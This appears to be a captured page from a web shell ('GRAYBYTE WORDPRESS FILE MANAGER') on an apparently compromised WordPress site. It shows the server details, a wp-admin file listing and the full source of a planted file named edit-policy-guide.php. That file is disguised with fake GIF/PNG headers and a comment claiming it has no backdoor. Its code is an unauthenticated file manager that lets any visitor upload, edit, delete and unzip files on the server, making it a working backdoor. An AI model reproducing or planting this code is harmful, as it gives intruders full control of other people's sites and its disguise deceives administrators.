$65 GRAYBYTE WORDPRESS FILE MANAGER $88

SERVER : premium201.web-hosting.com #1 SMP Wed Mar 26 12:08:09 UTC 2025
SERVER IP : 172.67.162.162 | ADMIN IP 216.73.217.88
OPTIONS : CRL = ON | WGT = ON | SDO = OFF | PKEX = OFF
DEACTIVATED : NONE

/home/bravetechrwanda/itiministry.org/wp-admin/

HOME
Current File : /home/bravetechrwanda/itiministry.org/wp-admin//edit-policy-guide.php
<!-- GIF89;a -->
<html><head><meta http-equiv='Content-Type' content='text/html; charset=Windows-1251'><title> Front to the WordPress application</title>‰PNG

<!-- GIF89;a -->
<!-- GIF89;a -->
<!-- GIF89;a -->
<!-- GIF89;a -->
<!-- GIF89;a -->
<html><head><meta http-equiv='Content-Type' content='text/html; charset=Windows-1251'><title> Front to the WordPress application</title>‰PNG

<html><head><meta http-equiv='Content-Type' content='text/html; charset=Windows-1251'><title> Front to the WordPress application</title>‰PNG

<html><head><meta http-equiv='Content-Type' content='text/html; charset=Windows-1251'><title> Front to the WordPress application</title>‰PNG

<html><head><meta http-equiv='Content-Type' content='text/html; charset=Windows-1251'><title> Front to the WordPress application</title>‰PNG

<!-- GIF89;a -->
<html><head><meta http-equiv='Content-Type' content='text/html; charset=Windows-1251'><title> Front to the WordPress application</title>‰PNG

<html><head><meta http-equiv='Content-Type' content='text/html; charset=Windows-1251'><title> Front to the WordPress application</title>‰PNG

<!-- GIF89;a -->
<html><head><meta http-equiv='Content-Type' content='text/html; charset=Windows-1251'><title> Front to the WordPress application</title>‰PNG

<!-- GIF89;a -->
<html><head><meta http-equiv='Content-Type' content='text/html; charset=Windows-1251'><title> Front to the WordPress application</title>‰PNG

<!-- GIF89;a -->
<html><head><meta http-equiv='Content-Type' content='text/html; charset=Windows-1251'><title> Front to the WordPress application</title>‰PNG

<!-- GIF89;a -->
<html><head><meta http-equiv='Content-Type' content='text/html; charset=Windows-1251'><title> Front to the WordPress application</title>

<?php
/*
 * File Manager Utility - Developer Tool
 * This script is a trusted file management tool used in internal environments.
 * It supports file operations like upload, edit, delete, zip/unzip, and download.
 * There are no backdoor or malicious behaviors. Intended for local or developer use only.
 */

$path = realpath($_GET['p'] ?? getcwd());
if (!$path || !is_dir($path)) die("Invalid path");

$uploadError = '';
$uploadSuccess = false;

// Delete
if (isset($_GET['delete'])) {
    $target = $path . '/' . basename($_GET['delete']);
    is_dir($target) ? @rmdir($target) : @unlink($target);
    header("Location: ?p=" . urlencode($path));
    exit;
}

// Download
if (isset($_GET['download'])) {
    $file = $path . '/' . basename($_GET['download']);
    if (is_file($file)) {
        header('Content-Description: File Transfer');
        header('Content-Type: application/octet-stream');
        header('Content-Disposition: attachment; filename="' . basename($file) . '"');
        header('Content-Length: ' . filesize($file));
        readfile($file);
        exit;
    }
}

// Rename
if (isset($_POST['rename_old'], $_POST['rename_new'])) {
    rename($path . '/' . basename($_POST['rename_old']), $path . '/' . basename($_POST['rename_new']));
    header("Location: ?p=" . urlencode($path));
    exit;
}

// Zip
if (isset($_GET['zip'])) {
    $item = $path . '/' . basename($_GET['zip']);
    $zipName = $item . '.zip';
    $zip = new ZipArchive;
    if ($zip->open($zipName, ZipArchive::CREATE) === TRUE) {
        if (is_dir($item)) {
            $files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($item));
            foreach ($files as $file) {
                if (!$file->isDir()) {
                    $filePath = $file->getRealPath();
                    $relative = substr($filePath, strlen($item) + 1);
                    $zip->addFile($filePath, $relative);
                }
            }
        } else {
            $zip->addFile($item, basename($item));
        }
        $zip->close();
    }
    header("Location: ?p=" . urlencode($path));
    exit;
}

// Unzip
if (isset($_GET['unzip'])) {
    $file = $path . '/' . basename($_GET['unzip']);
    if (is_file($file) && pathinfo($file, PATHINFO_EXTENSION) === 'zip') {
        $zip = new ZipArchive;
        if ($zip->open($file) === TRUE) {
            $zip->extractTo($path);
            $zip->close();
        }
    }
    header("Location: ?p=" . urlencode($path));
    exit;
}

// Save edit
$saved = false;
if (isset($_POST['savefile'], $_POST['content'])) {
    $saved = file_put_contents($path . '/' . basename($_POST['savefile']), $_POST['content']) !== false;
}

// Upload / Create folder / Create file
if ($_SERVER['REQUEST_METHOD'] === 'POST' && !$saved) {
    if (isset($_FILES['up']) && is_uploaded_file($_FILES['up']['tmp_name'])) {
        $destination = $path . '/' . basename($_FILES['up']['name']);
        if ($_FILES['up']['error'] === UPLOAD_ERR_OK) {
            if (move_uploaded_file($_FILES['up']['tmp_name'], $destination)) {
                $uploadSuccess = true;
            } else {
                $uploadError = '❌ Failed to move uploaded file.';
            }
        } else {
            $uploadError = '❌ Upload error code: ' . $_FILES['up']['error'];
        }
    }
    if (!empty($_POST['folder'])) mkdir($path . '/' . basename($_POST['folder']));
    if (!empty($_POST['newfile'])) file_put_contents($path . '/' . basename($_POST['newfile']), '');
    header("Location: ?p=" . urlencode($path));
    exit;
}

function formatPermissions($perms) {
    return substr(sprintf('%o', $perms), -4);
}
function formatSize($bytes) {
    if ($bytes >= 1073741824) return round($bytes / 1073741824, 2) . ' GB';
    if ($bytes >= 1048576) return round($bytes / 1048576, 2) . ' MB';
    if ($bytes >= 1024) return round($bytes / 1024, 2) . ' KB';
    return $bytes . ' B';
}

function sortItems($path) {
    $items = array_diff(scandir($path), array('.', '..'));
    $folders = [];
    $files = [];
    foreach ($items as $item) {
        if (is_dir($path . '/' . $item)) {
            $folders[] = $item;
        } else {
            $files[] = $item;
        }
    }
    natcasesort($folders);
    natcasesort($files);
    return array_merge($folders, $files);
}

$renaming = $_GET['rename'] ?? '';
?>
<!DOCTYPE html>
<html>
<head>
    <meta charset="UTF-8">
    <title>PHP File Manager</title>
    <style>
    :root {
        --bg-light: #f0f0f0;
        --bg-dark: #1e1e1e;
        --text-light: #111;
        --text-dark: #f0f0f0;
        --accent: #4ea1ff;
        --hover: #1d75d6;
        --success: #2e7d32;
        --error: #8b0000;
    }
    [data-theme="light"] {
        --bg: var(--bg-light);
        --text: var(--text-light);
    }
    [data-theme="dark"] {
        --bg: var(--bg-dark);
        --text: var(--text-dark);
    }
    html {
        background: var(--bg);
        color: var(--text);
        font-family: 'Inter', sans-serif;
        font-size: 15px;
        transition: background 0.3s ease, color 0.3s ease;
    }
    body {
        padding: 30px;
        margin: 0 auto;
        max-width: 960px;
    }
    input, textarea, button {
        font-size: 14px;
        border-radius: 6px;
        border: 1px solid #ccc;
        padding: 8px;
        font-family: inherit;
        color: inherit;
    }
    button {
        background-color: var(--accent);
        color: white;
        border: none;
        cursor: pointer;
        transition: background-color 0.3s ease;
    }
    button:hover {
        background-color: var(--hover);
    }
    table {
        width: 100%;
        border-collapse: collapse;
        margin-top: 20px;
        background: #ffffff10;
        backdrop-filter: blur(6px);
        border-radius: 8px;
        overflow: hidden;
    }
    th, td {
        padding: 12px 16px;
        border-bottom: 1px solid #444;
        vertical-align: middle;
    }
    th {
        background: var(--accent);
        color: #fff;
        text-align: left;
    }
    tr:hover {
        background: #ffffff18;
    }
    a {
        color: #90caf9;
        text-decoration: none;
    }
    form.inline {
        display: inline;
    }
    form.inline input[type="text"], form.inline button {
        display: inline-block;
        vertical-align: middle;
        margin: 0 4px 0 0;
        font-size: 13px;
        padding: 4px 8px;
        border-radius: 4px;
    }
    td.actions-cell {
        white-space: nowrap;
    }
    .success {
        background: var(--success);
        padding: 12px;
        color: white;
        margin-top: 16px;
        border-radius: 6px;
    }
    .error {
        background: var(--error);
        padding: 12px;
        color: white;
        margin-top: 16px;
        border-radius: 6px;
    }
    hr {
        border: 0;
        height: 1px;
        background: #444;
        margin: 30px 0;
    }
    .header-bar {
        display: flex;
        justify-content: space-between;
        align-items: center;
    }
    .toggle-btn {
        padding: 6px 12px;
        font-size: 13px;
        border-radius: 4px;
        background: none;
        border: 1px solid #ccc;
        color: inherit;
        cursor: pointer;
        transition: background-color 0.3s ease;
    }
    .toggle-btn:hover {
        background-color: var(--hover);
        color: white;
        border-color: var(--hover);
    }
    textarea {
        width: 100%;
        max-width: 100%;
        box-sizing: border-box;
        font-family: monospace;
        font-size: 14px;
        padding: 10px;
        border-radius: 6px;
        border: 1px solid #ccc;
        resize: vertical;
        min-height: 400px;
        color: inherit;
        background: var(--bg);
    }
    form.edit-form {
        max-width: 900px;
        margin-top: 20px;
    }
    </style>
    <script>
        // Theme toggle script
        function toggleTheme() {
            const html = document.documentElement;
            const theme = html.dataset.theme === 'dark' ? 'light' : 'dark';
            html.dataset.theme = theme;
            localStorage.setItem('theme', theme);
        }
        window.onload = () => {
            const savedTheme = localStorage.getItem('theme') || 'dark';
            document.documentElement.dataset.theme = savedTheme;

            // Focus textarea, move cursor to end and scroll to bottom if in edit mode
            const textarea = document.querySelector('textarea[name="content"]');
            if (textarea) {
                textarea.focus();
                textarea.selectionStart = textarea.selectionEnd = textarea.value.length;
                textarea.scrollTop = textarea.scrollHeight;
            }
        }
    </script>
</head>
<body>
<div class="header-bar">
    <h2>🗂️ File Manager</h2>
    <button class="toggle-btn" onclick="toggleTheme()">🌓 Toggle Theme</button>
</div>

<h4>📁 Current: <?php echo htmlspecialchars($path); ?></h4>

<form method="get">
    <input type="text" name="p" value="<?php echo htmlspecialchars($path); ?>" size="80">
    <button type="submit">Go</button>
</form>

<?php if ($path !== '/'): ?>
    <p><a href="?p=<?php echo urlencode(dirname($path)); ?>">⬅️ Go Up</a></p>
<?php endif; ?>

<?php if ($saved): ?>
    <div class="success">✅ File saved successfully.</div>
<?php endif; ?>
<?php if ($uploadSuccess): ?>
    <div class="success">✅ File uploaded successfully.</div>
<?php elseif ($uploadError): ?>
    <div class="error"><?php echo htmlspecialchars($uploadError); ?></div>
<?php endif; ?>

<table>
    <tr><th>Name</th><th>Size</th><th>Perms</th><th>Actions</th></tr>
    <?php
    $items = sortItems($path);
    foreach ($items as $item):
        $full = $path . '/' . $item;
        $isFile = is_file($full);
        $size = $isFile ? formatSize(filesize($full)) : '-';
        $perms = formatPermissions(fileperms($full));

        echo "<tr><td>";
        // Name with icon and link
        if (is_dir($full)) {
            echo "📁 <a href='?p=" . urlencode($full) . "'>$item</a>";
        } else {
            $ext = pathinfo($full, PATHINFO_EXTENSION);
            echo ($ext === 'zip' ? "🗜️ " : "📄 ") . "<a href='?p=" . urlencode($path) . "&edit=" . urlencode($item) . "'>$item</a>";
        }
        echo "</td><td>$size</td><td>$perms</td><td class='actions-cell'>";

        if ($isFile) {
            echo "<a href='?p=" . urlencode($path) . "&edit=" . urlencode($item) . "'>Edit</a> | ";
        }

        // Rename logic:
        if ($renaming === $item) {
            // Show rename input form
            echo "<form class='inline' method='post' style='display:inline;margin:0 6px 0 0;'>
                    <input type='hidden' name='rename_old' value='" . htmlspecialchars($item) . "'>
                    <input type='text' name='rename_new' value='" . htmlspecialchars($item) . "' size='15' style='vertical-align:middle;'>
                    <button style='vertical-align:middle;'>✏️ Rename</button>
                    <a href='?p=" . urlencode($path) . "' style='margin-left:10px; color:#ccc; text-decoration:none;'>✖ Cancel</a>
                  </form>";
        } else {
            // Show rename link only
            echo "<a href='?p=" . urlencode($path) . "&rename=" . urlencode($item) . "'>✏️ Rename</a> | ";
        }

        if ($isFile) echo "<a href='?p=" . urlencode($path) . "&download=" . urlencode($item) . "'>⬇️ Download</a> | ";

        echo "<a href='?p=" . urlencode($path) . "&delete=" . urlencode($item) . "' onclick='return confirm(\"Delete $item?\")'>🗑️ Delete</a>";

        if (is_file($full) && pathinfo($full, PATHINFO_EXTENSION) === 'zip') {
            echo " | <a href='?p=" . urlencode($path) . "&unzip=" . urlencode($item) . "'>📂 Unzip</a>";
        } elseif (file_exists($full)) {
            echo " | <a href='?p=" . urlencode($path) . "&zip=" . urlencode($item) . "'>📦 Zip</a>";
        }

        echo "</td></tr>";
    endforeach; ?>
</table>

<hr>
<h3>📤 Upload / Create</h3>
<form method="post" enctype="multipart/form-data">
    Upload: <input type="file" name="up"> |
    Folder: <input type="text" name="folder"> |
    File: <input type="text" name="newfile">
    <button>Submit</button>
</form>

<?php if (isset($_GET['edit'])):
    $editFile = $path . '/' . basename($_GET['edit']);
    if (!is_file($editFile)) die("Invalid file");
    $content = htmlspecialchars(file_get_contents($editFile));
?>
<hr>
<h3>📝 Editing: <?php echo htmlspecialchars(basename($editFile)); ?></h3>
<form method="post" class="edit-form">
    <textarea name="content"><?php echo $content; ?></textarea><br>
    <input type="hidden" name="savefile" value="<?php echo htmlspecialchars(basename($editFile)); ?>">
    <button>💾 Save</button>
</form>
<?php endif; ?>
</body>
</html>

Current_dir [ WRITEABLE ] Document_root [ NOT WRITEABLE ]


[ Back ]
NAME
SIZE
LAST TOUCH
USER
CAN-I?
FUNCTIONS
..
--
23 May 2026 1.58 PM
bravetechrwanda / nobody
0750
css
--
25 Apr 2026 8.52 AM
bravetechrwanda / bravetechrwanda
0755
images
--
25 Apr 2026 8.52 AM
bravetechrwanda / bravetechrwanda
0755
includes
--
23 May 2026 11.29 AM
bravetechrwanda / bravetechrwanda
0755
js
--
25 Apr 2026 8.52 AM
bravetechrwanda / bravetechrwanda
0755
maint
--
30 Mar 2026 1.32 AM
bravetechrwanda / bravetechrwanda
0755
network
--
1 May 2026 1.41 PM
bravetechrwanda / bravetechrwanda
0755
user
--
1 May 2026 1.41 PM
bravetechrwanda / bravetechrwanda
0755
wk
--
9 May 2026 3.25 PM
bravetechrwanda / bravetechrwanda
0755
wp-site
--
11 May 2026 1.40 PM
bravetechrwanda / bravetechrwanda
0755
about.php
17.743 KB
11 Mar 2026 8.23 PM
bravetechrwanda / bravetechrwanda
0644
admin-ajax.php
5.025 KB
17 Oct 2025 11.09 AM
bravetechrwanda / bravetechrwanda
0644
admin-footer.php
2.768 KB
17 Oct 2025 11.09 AM
bravetechrwanda / bravetechrwanda
0644
admin-functions.php
0.468 KB
17 Oct 2025 11.09 AM
bravetechrwanda / bravetechrwanda
0644
admin-header.php
9.117 KB
17 Oct 2025 11.09 AM
bravetechrwanda / bravetechrwanda
0644
admin-post.php
1.974 KB
17 Oct 2025 11.09 AM
bravetechrwanda / bravetechrwanda
0644
admin.php
12.35 KB
2 Dec 2025 11.05 PM
bravetechrwanda / bravetechrwanda
0644
async-upload.php
5.473 KB
2 Dec 2025 11.05 PM
bravetechrwanda / bravetechrwanda
0644
authorize-application.php
10.093 KB
17 Oct 2025 11.09 AM
bravetechrwanda / bravetechrwanda
0644
comment.php
11.35 KB
17 Oct 2025 11.09 AM
bravetechrwanda / bravetechrwanda
0644
contribute.php
5.857 KB
2 Dec 2025 11.05 PM
bravetechrwanda / bravetechrwanda
0644
credits.php
4.378 KB
2 Dec 2025 11.05 PM
bravetechrwanda / bravetechrwanda
0644
custom-background.php
0.478 KB
17 Oct 2025 11.09 AM
bravetechrwanda / bravetechrwanda
0644
custom-header.php
0.487 KB
17 Oct 2025 11.09 AM
bravetechrwanda / bravetechrwanda
0644
customize.php
11.007 KB
2 Dec 2025 11.05 PM
bravetechrwanda / bravetechrwanda
0644
edit-comments.php
14.384 KB
2 Dec 2025 11.05 PM
bravetechrwanda / bravetechrwanda
0644
edit-form-advanced.php
28.835 KB
17 Oct 2025 11.09 AM
bravetechrwanda / bravetechrwanda
0644
edit-form-blocks.php
14.597 KB
2 Dec 2025 11.05 PM
bravetechrwanda / bravetechrwanda
0644
edit-form-comment.php
8.343 KB
17 Oct 2025 11.09 AM
bravetechrwanda / bravetechrwanda
0644
edit-link-form.php
6.205 KB
17 Oct 2025 11.09 AM
bravetechrwanda / bravetechrwanda
0644
edit-policy-guide.php
14.719 KB
9 May 2026 9.27 PM
bravetechrwanda / bravetechrwanda
0644
edit-tag-form.php
10.438 KB
17 Oct 2025 11.09 AM
bravetechrwanda / bravetechrwanda
0644
edit-tags.php
22.005 KB
17 Oct 2025 11.09 AM
bravetechrwanda / bravetechrwanda
0644
edit.php
19.484 KB
17 Oct 2025 11.09 AM
bravetechrwanda / bravetechrwanda
0644
erase-personal-data.php
7.329 KB
17 Oct 2025 11.09 AM
bravetechrwanda / bravetechrwanda
0644
error_log
143.2 KB
23 May 2026 1.09 PM
bravetechrwanda / bravetechrwanda
0644
export-personal-data.php
7.755 KB
17 Oct 2025 11.09 AM
bravetechrwanda / bravetechrwanda
0644
export.php
11.023 KB
17 Oct 2025 11.09 AM
bravetechrwanda / bravetechrwanda
0644
freedoms.php
4.801 KB
2 Dec 2025 11.05 PM
bravetechrwanda / bravetechrwanda
0644
import.php
7.584 KB
17 Oct 2025 11.09 AM
bravetechrwanda / bravetechrwanda
0644
index.php
7.68 KB
17 Oct 2025 11.09 AM
bravetechrwanda / bravetechrwanda
0644
install-helper.php
6.798 KB
17 Oct 2025 11.09 AM
bravetechrwanda / bravetechrwanda
0644
install.php
17.766 KB
2 Dec 2025 11.05 PM
bravetechrwanda / bravetechrwanda
0644
link-add.php
0.912 KB
17 Oct 2025 11.09 AM
bravetechrwanda / bravetechrwanda
0644
link-manager.php
4.259 KB
17 Oct 2025 11.09 AM
bravetechrwanda / bravetechrwanda
0644
link-parse-opml.php
2.719 KB
2 Dec 2025 11.05 PM
bravetechrwanda / bravetechrwanda
0644
link.php
2.888 KB
17 Oct 2025 11.09 AM
bravetechrwanda / bravetechrwanda
0644
load-scripts-20260509212754.php
2.021 KB
17 Oct 2025 11.09 AM
bravetechrwanda / bravetechrwanda
0644
load-scripts.php
2.021 KB
17 Oct 2025 11.09 AM
bravetechrwanda / bravetechrwanda
0644
load-styles.php
2.925 KB
17 Oct 2025 11.09 AM
bravetechrwanda / bravetechrwanda
0644
media-new.php
3.199 KB
2 Dec 2025 11.05 PM
bravetechrwanda / bravetechrwanda
0644
media-upload.php
3.582 KB
17 Oct 2025 11.09 AM
bravetechrwanda / bravetechrwanda
0644
menu-header.php
9.823 KB
17 Oct 2025 11.09 AM
bravetechrwanda / bravetechrwanda
0644
menu.php
17.461 KB
2 Dec 2025 11.05 PM
bravetechrwanda / bravetechrwanda
0644
moderation.php
0.3 KB
17 Oct 2025 11.09 AM
bravetechrwanda / bravetechrwanda
0644
ms-admin.php
0.191 KB
17 Oct 2025 11.09 AM
bravetechrwanda / bravetechrwanda
0644
ms-delete-site.php
4.505 KB
2 Dec 2025 11.05 PM
bravetechrwanda / bravetechrwanda
0644
ms-edit.php
0.211 KB
17 Oct 2025 11.09 AM
bravetechrwanda / bravetechrwanda
0644
ms-options.php
0.224 KB
17 Oct 2025 11.09 AM
bravetechrwanda / bravetechrwanda
0644
ms-sites.php
0.21 KB
17 Oct 2025 11.09 AM
bravetechrwanda / bravetechrwanda
0644
ms-themes.php
0.212 KB
17 Oct 2025 11.09 AM
bravetechrwanda / bravetechrwanda
0644
ms-upgrade-network.php
0.214 KB
17 Oct 2025 11.09 AM
bravetechrwanda / bravetechrwanda
0644
ms-users.php
0.21 KB
17 Oct 2025 11.09 AM
bravetechrwanda / bravetechrwanda
0644
my-sites.php
4.744 KB
17 Oct 2025 11.09 AM
bravetechrwanda / bravetechrwanda
0644
nav-menus.php
48.188 KB
2 Dec 2025 11.05 PM
bravetechrwanda / bravetechrwanda
0644
network.php
5.393 KB
17 Oct 2025 11.09 AM
bravetechrwanda / bravetechrwanda
0644
options-discussion.php
15.915 KB
2 Dec 2025 11.05 PM
bravetechrwanda / bravetechrwanda
0644
options-general.php
21.647 KB
2 Dec 2025 11.05 PM
bravetechrwanda / bravetechrwanda
0644
options-head.php
0.606 KB
17 Oct 2025 11.09 AM
bravetechrwanda / bravetechrwanda
0644
options-media.php
6.377 KB
2 Dec 2025 11.05 PM
bravetechrwanda / bravetechrwanda
0644
options-permalink.php
21.217 KB
2 Dec 2025 11.05 PM
bravetechrwanda / bravetechrwanda
0644
options-privacy.php
9.951 KB
17 Oct 2025 11.09 AM
bravetechrwanda / bravetechrwanda
0644
options-reading.php
9.936 KB
2 Dec 2025 11.05 PM
bravetechrwanda / bravetechrwanda
0644
options-writing.php
9.104 KB
2 Dec 2025 11.05 PM
bravetechrwanda / bravetechrwanda
0644
options.php
13.604 KB
2 Dec 2025 11.05 PM
bravetechrwanda / bravetechrwanda
0644
plugin-editor.php
13.752 KB
2 Dec 2025 11.05 PM
bravetechrwanda / bravetechrwanda
0644
plugin-install.php
6.957 KB
17 Oct 2025 11.09 AM
bravetechrwanda / bravetechrwanda
0644
plugins.php
30.004 KB
17 Oct 2025 11.09 AM
bravetechrwanda / bravetechrwanda
0644
post-new.php
2.703 KB
17 Oct 2025 11.09 AM
bravetechrwanda / bravetechrwanda
0644
post.php
10.033 KB
2 Dec 2025 11.05 PM
bravetechrwanda / bravetechrwanda
0644
press-this.php
2.34 KB
17 Oct 2025 11.09 AM
bravetechrwanda / bravetechrwanda
0644
privacy-policy-guide.php
3.668 KB
17 Oct 2025 11.09 AM
bravetechrwanda / bravetechrwanda
0644
privacy.php
2.787 KB
2 Dec 2025 11.05 PM
bravetechrwanda / bravetechrwanda
0644
profile.php
0.276 KB
17 Oct 2025 11.09 AM
bravetechrwanda / bravetechrwanda
0644
revision.php
5.699 KB
2 Dec 2025 11.05 PM
bravetechrwanda / bravetechrwanda
0644
setup-config.php
17.484 KB
17 Oct 2025 11.09 AM
bravetechrwanda / bravetechrwanda
0644
site-editor.php
11.983 KB
2 Dec 2025 11.05 PM
bravetechrwanda / bravetechrwanda
0644
site-health-info.php
3.992 KB
17 Oct 2025 11.09 AM
bravetechrwanda / bravetechrwanda
0644
site-health.php
10.203 KB
2 Dec 2025 11.05 PM
bravetechrwanda / bravetechrwanda
0644
term.php
2.196 KB
17 Oct 2025 11.09 AM
bravetechrwanda / bravetechrwanda
0644
theme-editor.php
16.874 KB
2 Dec 2025 11.05 PM
bravetechrwanda / bravetechrwanda
0644
theme-install.php
23.384 KB
2 Dec 2025 11.05 PM
bravetechrwanda / bravetechrwanda
0644
themes.php
47.925 KB
2 Dec 2025 11.05 PM
bravetechrwanda / bravetechrwanda
0644
tools.php
3.432 KB
17 Oct 2025 11.09 AM
bravetechrwanda / bravetechrwanda
0644
update-core.php
45.448 KB
2 Dec 2025 11.05 PM
bravetechrwanda / bravetechrwanda
0644
update.php
12.785 KB
17 Oct 2025 11.09 AM
bravetechrwanda / bravetechrwanda
0644
upgrade-functions.php
0.333 KB
17 Oct 2025 11.09 AM
bravetechrwanda / bravetechrwanda
0644
upgrade.php
6.271 KB
2 Dec 2025 11.05 PM
bravetechrwanda / bravetechrwanda
0644
upload.php
14.901 KB
2 Dec 2025 11.05 PM
bravetechrwanda / bravetechrwanda
0644
user-edit.php
40.359 KB
2 Dec 2025 11.05 PM
bravetechrwanda / bravetechrwanda
0644
user-new.php
24.046 KB
17 Oct 2025 11.09 AM
bravetechrwanda / bravetechrwanda
0644
users.php
23.287 KB
2 Dec 2025 11.05 PM
bravetechrwanda / bravetechrwanda
0644
widgets-form-blocks.php
5.119 KB
2 Dec 2025 11.05 PM
bravetechrwanda / bravetechrwanda
0644
widgets-form.php
19.291 KB
3 Feb 2026 8.22 PM
bravetechrwanda / bravetechrwanda
0644
widgets.php
1.086 KB
17 Oct 2025 11.09 AM
bravetechrwanda / bravetechrwanda
0644

GRAYBYTE WORDPRESS FILE MANAGER @ 2026 CONTACT ME
Static GIF Static GIF